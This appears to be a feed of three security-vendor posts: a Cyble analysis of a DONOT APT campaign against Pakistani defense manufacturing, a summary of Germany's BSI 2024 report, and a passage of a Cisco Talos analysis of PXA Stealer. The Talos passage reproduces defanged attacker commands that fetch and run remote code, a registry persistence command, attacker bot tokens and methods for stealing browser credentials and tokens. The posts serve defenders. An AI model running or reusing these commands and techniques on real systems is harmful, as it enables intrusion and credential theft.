Key Takeaways

• Cyble Research and Intelligence Labs (CRIL) came across a campaign Linked to the known APT group DONOT, targeting the manufacturing industry that supports the country’s maritime and defense sectors.
• The campaign uses a malicious LNK file disguised as an RTF containing encrypted data. The file is decrypted via PowerShell to deliver a lure RTF and payload.
• A scheduled task is then created to ensure the malware runs every five minutes for persistence.
• Random domains are generated with hardcoded words and TLDs for backup C&C servers.
• The encryption method for C&C communication has changed compared to previous campaigns.
• The stager malware communicates with the C&C server using AES encryption and Base64 encoding to evade detection.
• The decryption key for the second-stage payload is now in the downloaded binary rather than hardcoded in the config file.
• The victim’s system information is collected before delivering the final payload to assess the target’s value.
• The stager malware uses environment variables to store critical configuration details, like C&C addresses and task information.

Overview

CRIL recently came across a campaign seemingly aimed at Pakistan’s manufacturing industry, which supports the country’s maritime and defense sectors. After analyzing the files involved in the campaign, it was determined that the attack was linked to the known APT group DONOT.

DoNot, also known as APT-C-35, is an Advanced Persistent Threat (APT) group operating since 2016. This group has a history of targeting government and military entities, as well as foreign affairs ministries and embassies across South Asia.

In this recent campaign, the Threat Actor (TA) uses the .LNK file as the initial infection vector, which could arrive within a RAR archive via spam email. The .LNK file is disguised as an RTF file, leading users to believe they are opening a legitimate file.

When the user clicks to execute, it triggers cmd.exe and powershell.exe to run additional malicious commands, loading the stager malware (a DLL file) and establishing persistence by creating a scheduled task to execute the DLL file through rundll32.exe. Also, it communicates with the primary C&C server by sending a unique device ID via a POST request and, in response, receives control commands from the TA to direct its next actions.

These actions include self-destruction, deployment of additional malicious payloads by downloading an encrypted payload from a specified URL, and subsequent execution. To evade detection and complicate analysis, the malware employs a different encryption method instead of the single-byte XOR key used in previous campaigns. The figure below shows the infection chain.

This “.LNK” file campaign was first identified by StrikeReady Labs, who reported it on the X platform. A similar campaign was also seen in July 2024, targeting Pakistan’s Government agencies and manufacturing industries using sector-specific lures. In the previous campaign, the TA employed malicious Office files with embedded macros and Rich Text Format (RTF) files that exploit vulnerabilities to load the stager DLL onto victim machines.

When comparing the previous campaigns, the initial infection vector has shifted from Microsoft Office files to .LNK files. Additionally, the stager DLL now employs an enhanced payload delivery method and improved C&C communication, incorporating encryption mechanisms at various stages.

Technical Analysis

The malicious “.LNK” file contains PowerShell commands, an encrypted lure RTF file, and the encrypted stager payload. Upon execution, the “.LNK” file initiates “cmd.exe,” which creates a directory in the “%temp%” path and copies “powershell.exe” to this location as “2SqSxDA2.exe.” The newly copied PowerShell process subsequently executes the PowerShell code embedded in the LNK file. The figure below shows the partial content of the LNK file.

PowerShell Code

The PowerShell command embedded within the “.LNK” file retrieves both a lure file and a DLL from the “.LNK” itself. It identifies the “.LNK” file based on its file size and directory path, then decrypts the lure RTF file and the DLL file using a single-byte XOR operation with “0xB2.” Decryption begins at offset “0x1774” for the lure file and “0x79AF” for the DLL.

These extracted files are stored in the “%temp%7GGVXwRn” directory. Once extraction is complete, the PowerShell command deletes the PowerShell copy “2SqSxDA2.exe,” opens the lure document, and calls “rundll32.exe” to execute the DLL, invoking the export function “HgCallClient.”

Lure Document

The lure document is related to Karachi Shipyard & Engineering Works (KS&EW), a prominent defense contractor and shipbuilding company in Pakistan. This suggests that the TA is targeting industries supporting the defense sector. The figure below shows the lure document.

DLL file analysis

Upon execution, the DLL begins extracting configuration details from an embedded JSON file. This configuration includes information such as the configuration filename, environment variable name, server domain, transit keys for secure communication, mutex, and user-agent string. The table below shows the configuration details.

Filed Name	Value
ConfigFileName	Config.json
EnvVarTaskName	PFTN
HMAC_Security	j4fhrJpSqvgE
MachineMutex	5734b817-1bb8-402b-a761-da8f2e188baf
ServerDomain	hxxps://internalfileserver[.]online:443/
TransitKey	tTRxrb0kmbQGpdci
TransitSalt	aWrtRHXuEBy6CwXj
userAgent	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
BackupServerURL	hxxps://safehydratedcloudcosmoswebglobe[.]cc/
PrimaryServerUrl	hxxps://internalfileserver[.]online:443/
FirstTaskName	Schedule
TaskDefinition	This service enables a user to configure and schedule automated tasks on this computer. It also hosts multiple Windows system-critical tasks. If this service is stopped or disabled, these tasks will not be run at their scheduled times, and any services that explicitly depend on it will fail to start.

Random domain generation

The BackupServerURL mentioned in the config file is generated by selecting six values from a hardcoded array of words and concatenating them to create a domain. A TLD is then selected from a separate array of TLD values. This randomly generated domain serves as a backup for Command and Control (C&C) communication. The figure below shows the list of available words used for generating random domains.

Persistence

After extracting the configuration details, the DLL checks for the presence of a specific scheduled task named “Schedule.” If the task is not found, it creates a new task to execute the DLL via “rundll32.exe” every 5 minutes for one day, as shown in the figure below.

After establishing persistence, the DLL sends a POST request to the primary server URL. This request includes headers such as an HMAC (Hash-based Message Authentication Code) generated from the HTTP method, contact URL, current DateTime, and an HMAC secret key, along with an “X-Timestamp.” The request body contains the unique DeviceID and configuration filename, encrypted using a hardcoded AES transit key and salt, then base64 encoded before being sent to the C&C primary URL. This encryption method marks a relatively new approach in this campaign compared to previous ones observed.

If the C&C server responds with a status code of 200, the response content contains JSON configuration data, which is decrypted using the same AES transit key and IV. The decrypted data includes the following details:

• DownloadURL
• FileDropEnvironment
• FileDropName
• ExportFunctionName
• TaskName
• Self_Destruction (boolean)
• Execution (boolean)

The decrypted JSON configuration data allows the TA to control key aspects of the malware’s behavior, such as downloading additional payloads, specifying file locations, and configuring execution options. This enables flexibility to adjust the attack as needed.

Next Stage payload Execution

If the TA intends to execute an additional payload, the encrypted payload is downloaded according to the C&C configuration. It is then decrypted using an XOR key found within the encrypted file, just after a sequence of magic bytes, and processed using the XOR round-robin method, as shown in Figure 10. This process differs from a previous campaign where the encrypted data was fetched from a URL, and the decryption key was provided directly in the C&C configuration, as shown in Figure 11

Once decryption is successful, the data is verified as a valid binary by checking for the presence of the string “This program cannot be run in DOS mode”. The decrypted payload is then placed in the directory specified by the “FileDropEnvironment” variable.

After verifying the binary, the stager malware creates a scheduled task to execute the decrypted binary using “rundll32.exe”. The task name and execution interval are specified in the configuration details provided by the TA via the C&C.

In case of a decryption failure, the stager malware updates the configuration with the backup server URL and logs the error message “File corruption while decrypting” It also collects detailed system information, such as disk space and installed security products, to help identify the cause of the decryption failure. This information is then sent to the TA via POST request.

In case of successful payload deployment through the scheduled task, the stager malware logs the event in the same manner as it does for a failure, with the only difference being that the result is recorded as “Payload Deployment Successful.” This log also contains detailed system information, helping the TA identify potential targets in case of success and detect security solutions in case of failure. The TA collects and logs all relevant details, regardless of the outcome, and sends the information to the TA’s C&C via POST request.

The stager malware typically stores data, including the number of attempts to communicate with the C&C, the primary C&C domain name, the last connection date, the backup domain name, and details of the second-stage payload. These values are stored as encrypted entries in the environment variables, as shown in the table below.

Variable Name	Value	Decrypted value
NFC (Not Found Count)	iOJDUU+oq2I1wQwfdYl98w==	2
PDN (Primary Domain Name)	ehdXQoPR9RjVlJYUWq+tIkQkazp1KhA1+59IGAXaXL94XRvH8aNbs9pv3e6PLCKK	hxxps://internalfileserver[.]online:443/
LCD (Last Check Date)	vKXaygaagiZygkd7/K+uvQ==	11-11-2024
BDN (Backup Domain Name)	“tc6rjFyW2AVO6pu2y/c/Vg626iQ+S/FHqYIGBpIejquLjQJwMxVv/r6q44XNnInvBJPP86CLYx9qKJ0lMfryxQ==”	hxxps://floridacloudcyberhydratedfloridatech[.]online/

During our testing, the C&C server was unavailable, preventing us from receiving a response. As a result, we were unable to observe or analyze the behavior of the next-stage DLL payload, which would have been triggered by communication with the C&C server. Without this crucial interaction, we could not fully understand how the payload executes or what further actions it might take.

Self- Deletion
If TA activates the self-destruction command via C&C, the stager malware removes the scheduled task and initiates self-deletion by executing the “DEL” command through “cmd.exe”. The image below illustrates the self-deletion process.

Threat Actor Attribution

The malicious DLL connects to the C&C server “internalfileserver[.]online,” which resolves to the IP address “94[.]141.120[.]137.” This same IP address previously hosted the domain “office-updatecentral[.]com,” which was used by the DoNot APT group in a prior campaign. Also, the tactics, techniques, and procedures (TTPs) observed in this campaign exhibit similar behavior to those reported by the 360 Threat Intelligence Centre.

Conclusion

This DoNot APT campaign shows an evolution in tactics. It uses malicious LNK files, PowerShell for payload delivery, and scheduled tasks for persistence. The group also employs dynamic domain generation for backup C&C servers and has updated its encryption methods to avoid detection.

The shift in how decryption keys are handled and the collection of system information before payload delivery indicate a more sophisticated approach. These changes highlight the growing complexity of APT campaigns and the need for improved detection and defense strategies.

Threat hunting Packages

The threat hunting package, including YARA and Sigma rules capable of detecting this campaign, can be downloaded from the linked GitHub pages.

Recommendations 

• Deploy robust EDR solutions to monitor unusual PowerShell activity, scheduled task creation, and suspicious network connections to C&C servers. Ensure these tools are configured to flag and alert on anomalies.
• Limit the execution of PowerShell and other scripting tools to necessary users only and enforce least privilege policies to prevent malware from escalating privileges and performing malicious actions.
• Conduct frequent audits of scheduled tasks to identify any unusual or unauthorized tasks, particularly those involving rundll32.exe. Ensure only trusted applications are allowed to create or execute scheduled tasks.
• Implement behavior-based detection systems that can identify malicious actions, such as frequent attempts to contact C&C servers or unexpected encrypted data being transmitted.
• Implement a well-defined incident response plan with clear steps to handle potential APT intrusions. This plan should include rapid identification, containment, and recovery from any detected malicious activity.
• Conduct regular cybersecurity awareness training for employees, focusing on identifying phishing emails and handling suspicious attachments to reduce the risk of initial infection.

Indicators of Compromise

Indicator	Indicator Type	Comments
cffe7eb01000de809b79a711702eaf3773f2e6167ce440f33f30bcd6fabcace3	SHA-256	Proc list 2024.lnk
a7893c54edaecaa0e56010576a8249ad9149456f5d379868a0ecaa4c5c33fa70	SHA-256	CertPropOrigin.dll
Internalfileserver[.]online	domain	C&C server

MITRE ATT&CK® Techniques 

Tactic	Technique	Procedure
Initial Access (TA0001)	Phishing (T1566)	This campaign is likely to reach users through spam emails.
Execution (TA0002)	Command and Scripting Interpreter: PowerShell (T1059.001)	PowerShell commands are used to decrypt and execute the lure RTF file and stager DLL payload.
Execution (TA0002)	Command and Scripting Interpreter: Windows Command Shell (T1059.003)	Cmd.exe is used to copy PowerShell.exe to the %temp% directory as “2SqSxDA2.exe”.
Defense Evasion (TA0005)	System Binary Proxy Execution: Rundll32 (T1218.011)	Rundll32.exe is used to execute the stager payload.
Persistence (TA0003)	Scheduled Task/Job: Scheduled Task (T1053.005)	A scheduled task is created for persistence, running the DLL payload regularly via rundll32.exe.
Defense Evasion (TA0005)	Indicator Removal on Host: File Deletion (T1070.004)	Temporary PowerShell.exe file (“2SqSxDA2.exe”) is deleted after executing the malicious commands.
Defense Evasion (TA0005)	Obfuscated Files or Information (T1027)	XOR and AES encryption mechanisms are used in various stages of the attack
Command and Control (TA0011)	Application Layer Protocol: Web Protocols (T1071.001)	GET and POST requests are sent to the Threat Actor’s C&C server.
Command and Control (TA0011)	Remote File Copy (T1105)	The additional payload is downloaded from the C&C server using a URL provided in the configuration.
Exfiltration (TA0010)	Exfiltration Over C2 Channel (T1041)	Extensive system information is collected and exfiltrated to the C&C server via encrypted communication.

References:

https://mp.weixin.qq.com/s/qCcuU0E6d84tdQ1r2dCsjA

https://twitter.com/StrikeReadyLabs/status/1852532673283268899

https://twitter.com/suyog41/status/1814230027560501248

The post Sailing Into Danger: DONOT APT’s Attack on Maritime & Defense Manufacturing appeared first on Cyble.

Blog – Cyble – ​Read More

Germany’s Federal Office for Information Security (BSI) recently released The State of Cybersecurity 2024 report, which illuminates the critical threats and advances in resilience across Germany’s digital landscape.

In a joint press briefing, Federal Minister of the Interior Nancy Faeser and BSI President Claudia Plattner said that while the cyberthreat landscape remains tense, resilience measures are proving effective in protecting businesses, institutions, and democratic processes.

Federal Minister Nancy Faeser noted the importance of cybersecurity for societal stability, stating, “Cybersecurity is central to our society and affects each and every one of us.” She highlighted that extortion, cyber espionage, and hybrid threats—especially from state-sponsored actors—continue to pose significant risks, necessitating robust cybersecurity investments to safeguard democratic institutions.

BSI President Claudia Plattner reinforced this stance, noting that Germany has witnessed increased resilience against cyber threats. However, she warned against complacency: “We must continue to increase our resilience in a nationwide effort.” Both leaders stressed the importance of swiftly incorporating the NIS-2 Directive into national law to fortify Germany’s cyber defenses.

Key Findings from BSI’s 2024 Report

Rising Threats from Malware and Ransomware Attacks

Between mid-2023 and mid-2024, an alarming increase in malware variants was recorded, with an average of 309,000 new variants discovered daily—a 26% increase over the previous year. Much of this rise is attributed to attacks targeting 64-bit Windows systems and an above-average increase in Android malware.

Ransomware continues to be a significant challenge, especially for businesses and government institutions. Data leaks following ransomware attacks have increased, although the percentage of victims paying ransom has dropped. LockBit leads the list of the five most active groups targeting Germany. The group published 40 alleged leak victims on its leak site during the reporting period, followed by BlackBasta and 8Base.

Many organizations now rely on robust backup systems, reducing their dependency on attackers to restore encrypted data. BSI observed that transparent communication about cyber incidents has helped mitigate potential impacts, as other organizations can swiftly address and close similar vulnerabilities.

Advanced Persistent Threats (APT) and Cyber Espionage

Germany noted the surge in persistent threats from Advanced Persistent Threat (APT) groups, many of which are state-sponsored. Against a backdrop of geopolitical tension, these groups are increasingly targeting political parties, governmental agencies, and corporations for cyber espionage. Germany urged its public and private sectors to adopt proactive threat intelligence and protective measures to defend against these sophisticated, continuous attacks.

Cybersecurity for Elections: Ensuring Democratic Integrity

For German citizens, not only the European elections but also three state elections in Saxony, Thuringia, and Brandenburg and nine local elections took place. The BSI said the electoral process, communication by the authorities and the media, and the formation of opinion and will in the context of elections are now highly dependent upon information technology and are, therefore, at the center of information security.

BSI provided dedicated security oversight, working with electoral authorities to protect the integrity of the voting process. As Germany heads toward future elections, the BSI has enhanced its monitoring and support for political entities, prioritizing resilience against potential cyber threats and disinformation campaigns from state actors.

Emerging Cybersecurity Challenges

Increase in High-Volume DDoS Attacks

The first half of 2024 saw a substantial uptick in Distributed Denial of Service (DDoS) attacks, with a marked increase in high-volume attacks exceeding 10,000 Mbps. DDoS attacks not only disrupt services but are increasingly used to sow public uncertainty by exaggerating their impact on social media.

 The BSI recommends adopting advanced DDoS mitigation strategies, particularly for critical infrastructure, to withstand these escalating attack volumes.

Data Theft Targeting Consumers

Phishing remains a major threat to German citizens, with attackers expanding beyond financial institution impersonation to include popular streaming services. During 2024, phishing campaigns have increasingly targeted user data—such as credit card information and personal identifiers—via emails masquerading as communications from banks and entertainment platforms. The BSI advises consumers to stay vigilant and adopt robust identity protection measures to counter phishing attempts.

Strategic Initiatives to Strengthen Cyber Resilience

Cybernation Germany Initiative

The Cybernation Germany initiative, launched in early 2024, is a step towards a national commitment to building resilience and expanding Germany’s cybersecurity expertise. The initiative’s goals align with the NIS-2 Directive and the Cyber Resilience Act (CRA), which impose mandatory cybersecurity measures and incident reporting standards for companies. The CRA emphasizes a “security by design” approach, particularly for IoT devices, to bolster protections across interconnected networks.

This initiative demonstrates a concerted push from Germany towards enhanced threat intelligence, cyber resilience, and protective infrastructure.

Key Recommendations from BSI for Strengthening Cybersecurity

1. Governance and Risk-Based Policies: Organizations should maintain updated, approved cybersecurity policies, leveraging threat intelligence to refine policies and prioritize high-risk threats.
2. Enhanced Monitoring and Detection: With the rise in malware and ransomware, BSI recommends integrating Security Operations Centers (SOC) with continuous threat detection and red teaming exercises to effectively simulate real-world scenarios.
3. Incident Response and Recovery: BSI encourages organizations to establish structured Incident Response plans, supported by Cyber Threat Intelligence (CTI), to reduce response times and facilitate efficient recovery from cyber incidents.
4. Increased Public Awareness and Resilience Measures: Awareness campaigns, employee training, and enhanced communication strategies have proven effective in helping organizations and consumers defend against phishing and ransomware attacks.
5. Collaboration with International Security Standards: Adhering to NIS-2 and the Cyber Resilience Act ensures that German entities align with European cybersecurity standards, enhancing cross-border protections and maintaining consistent security measures across sectors.

Conclusion: A Proactive Path Forward

The BSI’s 2024 report reaffirms Germany’s proactive approach to cybersecurity, emphasizing resilience, regulatory compliance, and advanced threat intelligence.

With heightened preparedness across government, businesses, and society, Germany is well-positioned to defend against increasingly sophisticated cyber threats. However, as Minister Faeser stated, the evolving cyber threat landscape necessitates continuous investment and adaptation to safeguard Germany’s critical infrastructure and democratic systems.

Germany’s Cybernation initiative and collaboration with international cybersecurity frameworks hint at a robust defense strategy that other nations can use as a model. By maintaining proactive measures, aligning with global security standards, and fostering a culture of resilience, Germany aims to ensure cybersecurity remains integral to its digital and democratic future.

References:

https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2024/241112_Lagebericht_2024.html

https://www.bsi.bund.de/EN/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html

The post Germany’s Cybersecurity Landscape in 2024 is Worrying but Gaining Resilience appeared first on Cyble.

Blog – Cyble – ​Read More

• Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia.  
• We discovered a new Python program called PXA Stealer that targets victims’ sensitive information, including credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software. 
• PXA Stealer has the capability to decrypt the victim’s browser master password and uses it to steal the stored credentials of various online accounts.  
• The attacker has used complex obfuscation techniques for the batch scripts used in this campaign. 
• We discovered the attacker selling credentials and tools in the Telegram channel “Mua Bán Scan MINI,” which is where the CoralRaider adversary operates, but we are not sure if the attacker belongs to the CoralRaider threat group or another Vietnamese cybercrime group. 

Victimology and targeted information  

The attacker is targeting the education sector in India and government organizations in European countries, including Sweden and Denmark, based on Talos telemetry data.  

The attacker’s motive is to steal the victim’s information, including credentials for various online accounts, browser login data, cookies, autofill information, credit card details, data from various cryptocurrency online and desktop wallets, data from installed VPN clients, gaming software accounts, chat messengers, password managers, and FTP clients.  

Attacker’s infrastructure 

Talos discovered that the attacker was hosting malicious scripts and the stealer program on a domain, tvdseo[.]com, in the directories “/file”, “/file/PXA/”, “/file/STC/”, and “/file/Adonis/”. The domain belongs to a Vietnamese professional search engine optimization (SEO) service provider; however, we are not certain whether the attacker has compromised the domain to host the malicious files or has subscribed to get legitimate access while still using it for their malicious purposes. 

We found that the attacker is using the Telegram bot for exfiltrating victims’ data. Our analysis of the payload, PXA Stealer, disclosed a few Telegram bot tokens and the chat IDs – controlled by the attacker.  

Attacker–controlled Telegram bot token

7545164691:AAEJ4E2f-4KZDZrLID8hSRSJmPmR1h-a2M4  7414494371:AAGgbY4XAvxTWFgAYiAj6OXVJOVrqgjdGVs

Attacker–controlled Telegram chat IDs

-1002174636072  -1002150158011  -4559798560  -4577199885  -4575205410

Attacker’s underground activities 

We identified attacker’s Telegram account “Lone None,” which was hardcoded in the PXA Stealer program and analyzed various details of the account, including the icon of Vietnam’s national flag and a picture of the emblem for Vietnam’s Ministry of Public Security, which aligns with our assessment that the attacker is of Vietnamese origin. Also, we found Vietnamese comments in the PXA Stealer program, which further strengthen our assessment.  

The attacker’s Telegram account has biography data that includes a link to a private antivirus checker website that allows users or buyers to assess the detection rate of a malware program. This website provides a platform for potential threat actors to evaluate the effectiveness and stealth capabilities of the malware before purchasing it, indicating a sophisticated level of service and professionalism in the threat actor’s operations. 

We also discovered that the attacker is active in an underground Telegram channel, “Mua Bán Scan MINI,” mainly selling Facebook accounts, Zalo accounts, SIM cards, credentials, and money laundry data. Talos observed that this Vietnamese actor is also seen in the Telegram group in which the CoralRaider actor operates. However, we are not certain whether the actor is a member of the CoralRaider gang or another Vietnamese cybercrime group.  

Talos discovered that the attacker is also promoting another underground Telegram channel, “Cú Black Ads – Dropship,” by sharing a few automation tools to manage large numbers of user accounts in their channel and conducting the exchanging or selling of information related to social media accounts, proxy services, and a batch account creator tool.  

The tools shared by the attacker in the group are automated utilities designed to manage several user accounts. These tools include a Hotmail batch creation tool, an email mining tool, and a Hotmail cookie batch modification tool. The compressed packages provided by the threat actor often contain not only the executable files for these tools but also their source code, allowing users to modify them as needed.  

We found that the attacker is not sharing all the tools for free, and some of them require users to send a unique key back to the Telegram channel administrator for software activation. This process ensures that only those who have been vetted or have paid for the tool can access its full functionality.  We also discovered that these tools are distributed on other websites, such as aehack[.]com, highlighting that they are selling the tools. Additionally, a YouTube channel exists that provides tutorials on how to use these tools, further facilitating their widespread use and demonstrating the organized efforts to market and instruct potential users on their application. 

Infection Chain

The attacker gains initial access by sending a phishing email with a ZIP file attachment, according to our telemetry data. The ZIP file contains a malicious loader executable file compiled in Rust language and a hidden folder called Photos. The hidden folder has other recurring folders, such as Documents and Images, that contain obfuscated Windows batch scripts and a decoy PDF document. 

When a victim extracts the attachment ZIP file, the hidden folder and the malicious Rust loader executable are dropped onto the victim machine. When the malicious Rust loader executable is run by the victim, it loads and executes multiple obfuscated batch scripts that are in the dropped hidden folders.   

We deobfuscated the Windows batch scripts using CyberChef, with each step in the process being crucial and requiring precise execution to achieve accurate deobfuscation. First, we employed regular expressions (regex) to filter out random characters consisting of uppercase and lowercase letters (A to Z). These random strings ranged in length from six to nine characters and were enclosed within “%” symbols. Next, we filtered out the “^” symbols and removed any remaining uppercase and lowercase letters (A to Z) as well as special characters “_,” /’(?),” “$,” “#,” and “[].”  Finally, we eliminated the “%” symbols and we were able to successfully deobfuscate the scripts and reveal their PowerShell commands. 

Snippet of the obfuscated batch script	Snippet of the deobfuscated batch script

The batch scripts execute PowerShell commands simultaneously, performing the following activities on the victim machine: 

• Opens a decoy PDF document of a Glassdoor job application form. 

• Downloads a portable Python 3.10 package archive masquerading as “synaptics.zip”, which is hosted on the attacker-controlled domain through the hardcoded URL “hxxps[://]tvdseo[.]com/file/synaptics[.]zip”, and saves it in the user profile’s temporary folder as well as in the public user’s folder with the random file names and extracts them. 

C:WINDOWSsystem32cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]SecurityProtocolType]::Tls12; (New-Object -TypeName System[.]Net[.]WebClient).DownloadFile('hxxps[://]tvdseo[.]com/file/synaptics[.]zip', [System[.]IO[.]Path]::GetTempPath() + 'EAnLaxUKaI[.]zip') 
  
C:WINDOWSsystem32cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]SecurityProtocolType]::Tls12; (New-Object -TypeName System[.]Net[.]WebClient).DownloadFile('hxxps[://]tvdseo[.]com/file/synaptics[.]zip', 'C:UsersPublicoZHyMUy4qk[.]zip')  
  
C:WINDOWSsystem32cmd[.]exe /S /D /c echo $dst = [System[.]IO[.]Path]::Combine([System[.]Environment]::GetFolderPath('LocalApplicationData'), 'EAnLaxUKaI'); Add-Type -AssemblyName System[.]IO[.]Compression[.]FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force $dst* } else { New-Item -ItemType Directory -Force $dst } ; [System[.]IO[.]Compression[.]ZipFile]::ExtractToDirectory([System[.]IO[.]Path]::Combine([System[.]IO[.]Path]::GetTempPath(), 'EAnLaxUKaI[.]zip'), $dst)  
  
C:WINDOWSsystem32cmd[.]exe /S /D /c echo Add-Type -AssemblyName System[.]IO[.]Compression[.]FileSystem; [System[.]IO[.]Compression[.]ZipFile]::ExtractToDirectory('C:/Users/Public/oZHyMUy4qk[.]zip', 'C:/Users/Public/oZHyMUy4qk')  

• Then, it creates and runs a Windows shortcut file with the file name “WindowsSecurity.lnk”, configuring a base64-encoded command as a command line argument in the user profile’s temporary folder and configures the “Run” registry key with the path of the shortcut file to establish persistence. 

C:WINDOWSsystem32cmd[.]exe /S /D /c echo $s = $payload = import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='));$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut($env:LOCALAPPDATAWindowsSecurity.lnk);$link.WindowStyle = 7;$link.TargetPath = $env:LOCALAPPDATAEAnLaxUKaIsynaptics.exe;$link.IconLocation = C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe,13;$link.Arguments = -c `$payload`";$link.Save()  
  
C:WINDOWSsystem32cmd[.]exe /S /D /c echo New-ItemProperty -Path 'HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun' -Name 'Windows Security' -PropertyType String -Value 'C:WindowsExplorer.EXE C:UsersMarsiAppDataLocalWindowsSecurity.lnk' -Force 

• The Windows shortcut file with a single-line Python script using a disguised portable Python executable downloads a base64-encoded Python program from a remote server. The downloaded program contains instructions to disable the antivirus programs on the victim’s machine.  

cmd[.]exe  /c start "" /min C:UsersPublicoZHyMUy4qksynaptics[.]exe -c "import urllib[.]request;import base64;exec(base64.b64decode(urllib[.]request[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_PURE_ENC')[.]read()[.]decode('utf-8')))" 

• Next, the batch script continues to execute another PowerShell command that downloads the PXA Stealer Python program and executes it with the masqueraded portable Python executable “synaptics.exe” on the victim’s machine.  

cmd[.]exe /c start  /min C:UsersPublicoZHyMUy4qksynaptics[.]exe -c import urllib[.]request;import base64;exec(base64.b64decode(urllib[.]request[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_BOT')[.]read()[.]decode('utf-8'))) 

• Another batch script called “WindowsSecurity.bat” is dropped in the Windows startup folder of the victim’s machine to establish persistence, which has the command to download and execute the PXA Stealer Python program shown in the earlier paragraph.  

PXA Stealer targets victims’ sensitive data 

PXA Stealer is a Python program that has extensive capabilities targeting a variety of data on the victim’s machine.   

When the PXA Stealer is executed, it kills a variety of processes from a hardcoded list, including endpoint detection software, network capture and analysis process, VPN software, cryptocurrency wallet applications, file transfer client applications, and web browser and instant messaging application processes by executing “task kill” commands.  

The stealer has the capability of decrypting the browser master key, which is a cryptographic key used by web browsers like Google Chrome and other Chromium-based browsers to protect sensitive information, including stored passwords, cookies, and other data in an encrypted form on the local system. The stealer accesses the master key file “Local State” located in the browser folder of the user’s profile directory, which contains the information of the encryption key used to encrypt the user data stored in the “Login Data” file, and decrypts it using the “CryptUnprotectData” function. This allows the attacker to gain access to the stored credentials and other sensitive browser information.   

The stealer also attempts to decrypts the master key that is stored in the key4.db file. Key4.db is a database used by Firefox (and some other Mozilla-based browsers) to store encryption keys, particularly the master key that encrypts sensitive data, such as saved passwords. The “getKey” function of the stealer is designed to extract and decrypt keys from the key4.db file using either AES or 3DES encryption methods, depending on the encryption used in the stored key. 

The stealer attempts to retrieve user profiles paths from the profiles.ini file of browser applications, including Mozilla Firefox, Pale Moon, SeaMonkey, Waterfox, Mercury,  k-Melon, IceDragon, Cyberfox, and BlackHaw for further processing, such as extracting saved passwords or other user data. 

The stealer collects the victim’s login information from the browser’s login data file. The function “get_ch_login_data” of the stealer extracts login data, including URLs, usernames, and passwords, from the database “login_db”, which stores login information. The extracted login information is formatted into a string that includes the URL, username, decrypted password, browser, and profile.  

For each login entry in the browser login database, the function checks if the URL contains any important keywords that are hardcoded in the stealer program, and if a match is found, the login information is saved in a separate file named “Important_Logins.txt” located in the “Browsers Data” folder within the user’s profile temporary directory. The function saves all the results to “All_Passwords.txt” in the “Browsers Data” folder for other login data found in the database. 

The stealer executes another function, “get_ch_cookies”, to extract cookies from a specified browser’s cookie database, decrypt them, and save the results to a file. First, it checks if the cookies database file exists in the specified profile directory and unlocks the cookies database file. The database file is then copied to the temporary folder and is processed by executing an SQL query to retrieve cookie information, including host key, name, path, encrypted value, expiration time, secure flag, and HTTP-only flag from the cookies database file.  

If any Facebook cookies are found, they are concatenated to a single string called “fb_formatted”, and it calls another function, “ADS_Checker()”, to check for ads based on the Facebook cookies, and the results are written to a file called “Facebook_Cookies.txt”.  Any other cookie information is written to a text file named after the browser and the profile. Finally, the function removes the temporary cookie database file. 

In another sample of the stealer, for the browsers Chrome, Chrome SxS, and Chrome(x86), it downloads and executes a cookie stealer JavaScript through the URL hxxps://tvdseo[.]com/file/PXA/Cookie_Ext.zip. The cookie stealer JavaScript connects to the Telegram bot with the token, and the chat ID hardcoded in the script collects the cookies and sends them to the attacker’s Telegram bot through the POST method.  

Next, the stealer targets the victim’s credit card information stored in the browser database “webappsstore.sqlite”. The function extracts and decrypts saved credit card information from a browser’s web data database. It checks if the cards database file “cards_db” exists and copies them to the user’s profile temporary folder. It executes a SQL query to retrieve credit card information including name on card, expiration month/year, encrypted card number, and date modified. Then it decrypts the encrypted card number using the function “decrypt_ch_value” with the help of the decrypted master key. It writes the cards’ information to a text file and names it after the browser and the profile. Finally, it gets the count of credit card information that was found and deletes the temporary copy of the “cards_db” file.  

The stealer extracts and saves the autofill form data from a browser’s database to a text file with the file name format of “$browser_$profile.txt” in a folder called “AutoFills” in browser profile location.  

The stealer also extracts and validates Discord tokens stored in various browsers or Discord applications. It checks for the stored encrypted Discord tokens in the different browser database files and also Discord-specific applications files of Discord, Discord Canary, Lightcord, and Discord PTB on the victim’s machine by searching for strings using regular expression “r”dQw4w9WgXcQ:[^.*[‘(.*)’].*$][^”]*”)”. Once the encrypted tokens are found, it decrypts them with the function “decrypt_dc_tokens()” using the extracted master key that was used to encrypt the tokens from the “Local State” file. Then, it validates the decrypted Discord tokens to check if it is a legitimate Discord token and stores it by associating it with the browser name. Besides searching for the encrypted tokens, the function also looks for unencrypted Discord tokens by searching strings that match the regular expression pattern “[w-]{24}.[w-]{6}.[w-]{27}” for standard tokens and “mfa.[w-]{84}” for multi-factor authentication (MFA) tokens in “.log” and “.ldb” files in the levelDB directory of Discord applications or web browsers where the structured key-value data is stored in levelDB database format. 

The stealer executes another function to extract the user information from the MinSoftware application database. It searches for the database file “db_maxcare.sqlite” file on the victim machine folders, including Desktop, Documents, Downloads, OneDrive and in the logical partitions with the drive letters “D:” and “E:”. Once found, it executes a SQL query to search in the accounts table of the database file and extracts the following data: 

• uid: User identifier. 
• pass: User’s password. 
• fa2: Two-factor authentication data. 
